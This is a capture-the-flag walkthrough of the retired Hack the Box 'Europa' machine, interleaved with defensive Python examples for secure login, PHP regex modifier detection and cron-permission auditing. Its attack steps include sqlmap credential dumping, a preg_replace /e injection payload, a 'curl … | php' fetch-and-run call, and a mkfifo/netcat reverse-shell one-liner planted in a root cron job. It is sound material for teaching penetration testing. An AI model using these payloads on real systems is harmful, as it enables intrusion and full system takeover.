Today we are going to solve another CTF challenge, “Europa”, which is available online for those who want to increase their skills in penetration testing. Europa is a retired vulnerable lab presented by Hack the Box.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 15:43 W. Europe Standard Time
Nmap scan report for 10.10.10.22
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   http/1.1
|   http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.94 seconds
As you have seen in all our previous labs, we love to explore the target IP via port 80 in the web browser, and we followed that tradition here too, but unluckily this time it did not work at all.
The remaining option was to add the target IP to the /etc/hosts file, since the certificate on port 443 contained two domain names; as this is a Hack the Box challenge, I mapped europacorp.htb and admin-portal.europacorp.htb to the target IP as hostnames.
Then I browsed to admin-portal.europacorp.htb and found the following login page, as shown below.
To breach confidentiality we can try a form-based SQL injection attack; for this I preferred sqlmap, with the following command to enumerate the database names.
sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form --dbs --batch
Luckily our assumption held true and it dumped the database name “admin”.
Then I ran the following command to enumerate the entire table contents.
sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form -D admin --all --batch
Awesome!! I found a table “users” with 2 entries having username and password columns.
Using an online MD5 lookup I cracked the password hash and obtained “SupersecretPassword!”, and used these credentials to log in to the admin console.
After successful validation I got the dashboard, from where I moved to the Tools option.
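Two weaknesses made the steps above work: the login query could be influenced by form input (which is what sqlmap's --form mode probes for), and the stored hashes were plain MD5, so an online lookup table recovered the password. The following is an added Python example, not code from the box or the write-up, showing the vulnerable login shape next to a hardened one: a parameterised query plus salted, iterated PBKDF2 hashes verified in constant time. The user rows, passwords and the sqlite3 in-memory table are constructed placeholders, not the box's data.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample data: "admin" is stored the way the write-up found it
# (unsalted MD5); "ops" uses the salted, iterated scheme defined below.
LEGACY_ADMIN_PASSWORD = "example-password"   # placeholder, not the box's password
OPS_PASSWORD = "ops-example-secret"          # placeholder


def hash_password(password: str, iterations: int = 100_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; a per-user salt defeats precomputed lookups."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check; any record not in the salted format is rejected."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False          # legacy unsalted record: unusable, force a reset
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def make_db() -> sqlite3.Connection:
    """In-memory users table mirroring the username/password columns sqlmap dumped."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", hashlib.md5(LEGACY_ADMIN_PASSWORD.encode()).hexdigest()))
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("ops", hash_password(OPS_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Query assembled by string formatting: the shape sqlmap --form exploits."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{pw_hash}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterised lookup plus salted verification; input never becomes SQL text."""
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = make_db()
    injected = "admin' -- "   # the trailing comment removes the password clause
    print("vulnerable, injected:", login_vulnerable(db, injected, "anything"))  # True
    print("safe, injected:      ", login_safe(db, injected, "anything"))        # False
    print("safe, real password: ", login_safe(db, "ops", OPS_PASSWORD))         # True
```

Note that login_safe also refuses the legacy MD5 row outright: after a breach like this one, unsalted records should be invalidated and re-hashed on the next password reset rather than kept verifiable.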
It was set up with a script for an OpenVPN config generator that used the PHP function preg_replace() on user input. When I investigated this function further, the advice is not to use preg_replace() with user-controlled patterns, as it can lead to a code execution vulnerability.
Taking that advice as true, I captured its request in Burp Suite and sent it to the Repeater to exploit the command injection vulnerability.
Here I noticed three parameters, pattern, ipaddress, and text, where we can add our arbitrary code for execution, but before that you need to know the correct steps for how to exploit it manually.
So when I searched further I found many links describing the /e option (the eval modifier) as the threat in PHP's preg_replace() function.
Now the code can be executed by sending an HTTP POST request in the format given below.
pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres
For example, to list the directory we can run the following command and verify the resulting output.
pattern=/ip_address/e&ipaddress=ls &text=ip_addres
Similarly we can run any malicious code here to obtain a reverse connection.
Now it is just a matter of changing the system() command parameters and getting a reverse shell. Set up an HTTP server to serve the PHP file, and a netcat listener to catch the shell.
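The detection side of the /e story, as an added Python example that is not part of the original write-up: a small parser that splits a PHP-style PCRE string into its body and modifier flags (PHP accepts any non-alphanumeric, non-backslash, non-whitespace delimiter plus the four bracket pairs), and a request inspector that flags form bodies whose pattern parameter carries /e or any modifier outside an allow-list. The allow-list and the parameter name are assumptions chosen to match the three parameters seen in Burp. Two facts worth knowing when fixing the application itself: /e was deprecated in PHP 5.5 and removed in PHP 7.0, and preg_replace_callback() is the documented replacement; a user-supplied string should be passed through preg_quote() if it must end up inside a pattern at all.

```python
from urllib.parse import parse_qs

# Bracket-style delimiters PHP accepts for PCRE patterns.
BRACKET_PAIRS = {"(": ")", "[": "]", "{": "}", "<": ">"}
# Assumed allow-list: flags a legitimate config template might plausibly need.
SAFE_MODIFIERS = set("imsxuD")


def split_pcre(pattern: str):
    """Return (body, modifiers) for a PHP-style pattern such as '/ip_address/e'."""
    pattern = pattern.lstrip()
    if not pattern:
        raise ValueError("empty pattern")
    start = pattern[0]
    if start.isalnum() or start == "\\" or start.isspace():
        raise ValueError(f"invalid delimiter {start!r}")
    end = BRACKET_PAIRS.get(start, start)
    depth = 0
    i = 1
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\":            # escaped char: skip it and whatever follows
            i += 2
            continue
        if end != start and ch == start:
            depth += 1            # nested opening bracket inside the body
        elif ch == end:
            if depth == 0:
                return pattern[1:i], pattern[i + 1:]
            depth -= 1
        i += 1
    raise ValueError("no ending delimiter found")


def unsafe_modifiers(pattern: str) -> list:
    """Modifier letters outside the allow-list; 'e' is the code-execution one."""
    _, mods = split_pcre(pattern)
    return sorted(set(mods) - SAFE_MODIFIERS)


def has_eval_modifier(pattern: str) -> bool:
    _, mods = split_pcre(pattern)
    return "e" in mods


def inspect_form_body(body: str, param: str = "pattern") -> list:
    """Findings for one x-www-form-urlencoded body; an empty list means clean."""
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get(param, []):
        try:
            bad = unsafe_modifiers(value)
        except ValueError as exc:
            findings.append(f"{param}={value!r} rejected: {exc}")
            continue
        if bad:
            findings.append(f"{param}={value!r} uses disallowed modifier(s) {bad}")
    return findings


if __name__ == "__main__":
    # Constructed request bodies: the write-up's directory-listing payload and a benign one.
    for body in ("pattern=/ip_address/e&ipaddress=ls &text=ip_addres",
                 "pattern=/ip_address/i&ipaddress=10.0.0.1&text=ip_address"):
        print(body, "->", inspect_form_body(body) or "clean")
```

The same check can run in a WAF rule or over stored access logs where POST bodies are captured; a rejected or malformed delimiter is also worth logging, since a regex that the server-side code would choke on is rarely what a legitimate user sends.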
D:\PENTEST\HTB\europa>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [07/Nov/2018 09:22:20] "GET /shell.php HTTP/1.1" 200 -
Next, in Burp Repeater: system('curl http://10.10.14.28/shell.php | php')
C:\Users\hillie>nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 43764
Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 10:16:14 up 13:06,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@europa:/var/www/cmd$ whoami && id
whoami && id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege escalation
Following my usual information gathering steps, I found a vulnerable running cronjob!
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you do not have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /var/www/cronjobs/clearlogs <---- THIS ONE HERE
Cron is calling a clearlogs script at /var/www/cronjobs/clearlogs with root privileges. Content of clearlogs:
$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
The clearlogs script clears access.log and executes /var/www/cmd/logcleared.sh, which we have write access to! (Or, if the file doesn't exist, create it and chmod 777 it.) Because we can write to the file, we control its contents; long story short, we control what will be executed as root each time the cron job runs. I just made another reverse shell which connected back to me:
echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9876 > /tmp/f" > script.sh
Note: Make sure the two netcat connections use different ports; reusing the same one won't work.
Once the cronjob calls /var/www/cronjobs/clearlogs, our malicious logcleared.sh file will be executed, which gives us a root shell!
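The root cause here is a root-run cron job that hands control to a path an unprivileged user can write or create. The following is an added Python audit example, not part of the original write-up or the box: it parses system-crontab lines, takes every absolute path in a root job's command, follows exec()-style calls inside PHP scripts one level deep, and reports any target that is group/world writable or missing inside a writable directory. To run offline it rebuilds the relevant part of the layout described above in a scratch directory (the clearlogs script exactly as shown, /var/www/cmd mode 0777, logcleared.sh absent); those permissions are a constructed reproduction, not something read from the box.

```python
import os
import re
import stat
import tempfile

# One job line of /etc/crontab: five time fields, a user, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
# Absolute paths handed to shell-out functions inside a PHP script.
EXEC_CALL = re.compile(r"""\b(?:exec|shell_exec|system|passthru)\s*\(\s*['"](/[^'"]+)['"]""")


def parse_system_crontab(text):
    """Yield (user, command) for each job in system-crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment or VAR=value line
        m = CRON_LINE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")


def group_or_world_writable(path):
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def exec_targets(script_path):
    """Paths a PHP cron script hands to exec()-style calls (empty if unreadable)."""
    try:
        with open(script_path, errors="replace") as fh:
            return EXEC_CALL.findall(fh.read())
    except OSError:
        return []


def check_path(path, shown, context, findings):
    """Flag a writable file, or a missing file inside a writable directory."""
    parent = os.path.dirname(path)
    if os.path.exists(path):
        if group_or_world_writable(path):
            findings.append(f"{shown} is group/world writable ({context})")
    elif os.path.isdir(parent) and group_or_world_writable(parent):
        findings.append(f"{shown} is missing and its directory is group/world "
                        f"writable, so anyone can create it ({context})")


def audit_crontab(crontab_text, root="/"):
    """Findings for root jobs whose command, or an exec() target of it, is hijackable."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for token in re.findall(r"/\S+", cmd):          # absolute paths in the command
            path = os.path.join(root, token.lstrip("/"))
            check_path(path, token, f"cron: {cmd}", findings)
            for target in exec_targets(path):
                tpath = os.path.join(root, target.lstrip("/"))
                check_path(tpath, target, f"exec() in {token}", findings)
    return findings


# Constructed sample: the two relevant lines of the crontab shown above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /var/www/cronjobs/clearlogs
"""
CLEARLOGS_SRC = """#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
"""


def build_demo_tree():
    """Scratch tree: the root-run script itself is fine, its exec() target dir is 0777."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    cronjobs, cmd_dir = (os.path.join(root, d) for d in ("var/www/cronjobs", "var/www/cmd"))
    os.makedirs(cronjobs)
    os.makedirs(cmd_dir)
    script = os.path.join(cronjobs, "clearlogs")
    with open(script, "w") as fh:
        fh.write(CLEARLOGS_SRC)
    os.chmod(script, 0o755)
    os.chmod(cronjobs, 0o755)
    os.chmod(cmd_dir, 0o777)   # the weakness: logcleared.sh is absent and anyone can create it
    return root


def demo():
    return audit_crontab(SAMPLE_CRONTAB, root=build_demo_tree())


if __name__ == "__main__":
    for finding in demo():
        print("FINDING:", finding)
```

The check looks only at the group/world write bits; a fuller audit would also flag a root job whose script or target is owned by a non-root user, resolve symlinks, and walk run-parts directories. The fix on the box side is the mirror image of the finding: the exec() target must exist, be owned by root and be writable by nobody else, or the cron job should not call out to /var/www at all.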
C:\Users\hillie>nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 49460
/bin/sh: 0: can't access tty; job control turned off
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@europa:~# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
europa
Author : Jacco Straathof